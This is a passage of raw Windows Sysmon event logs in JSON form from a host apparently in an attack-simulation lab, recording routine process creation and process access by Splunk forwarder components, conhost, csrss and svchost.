{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2748,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.930\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-020A-5F25-0000-001052DF0400}\r\nTargetProcessId: 4508\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.930","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-020A-5F25-0000-001052DF0400}","TargetProcessId":"4508","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2749,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.635\r\nProcessGuid: {A837DB8D-020C-5F25-0000-00104AE10400}\r\nProcessId: 4544\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:56.635","ProcessGuid":"{A837DB8D-020C-5F25-0000-00104AE10400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2750,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.634\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-020C-5F25-0000-00104AE10400}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:56.634","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-020C-5F25-0000-00104AE10400}","TargetProcessId":"4544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2751,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.634\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-020C-5F25-0000-00104AE10400}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:56.634","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-020C-5F25-0000-00104AE10400}","TargetProcessId":"4544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2752,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.634\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:56.634","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2753,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.634\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:56.634","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2754,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.634\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:56.634","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2755,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.634\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:56.634","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2756,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.634\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 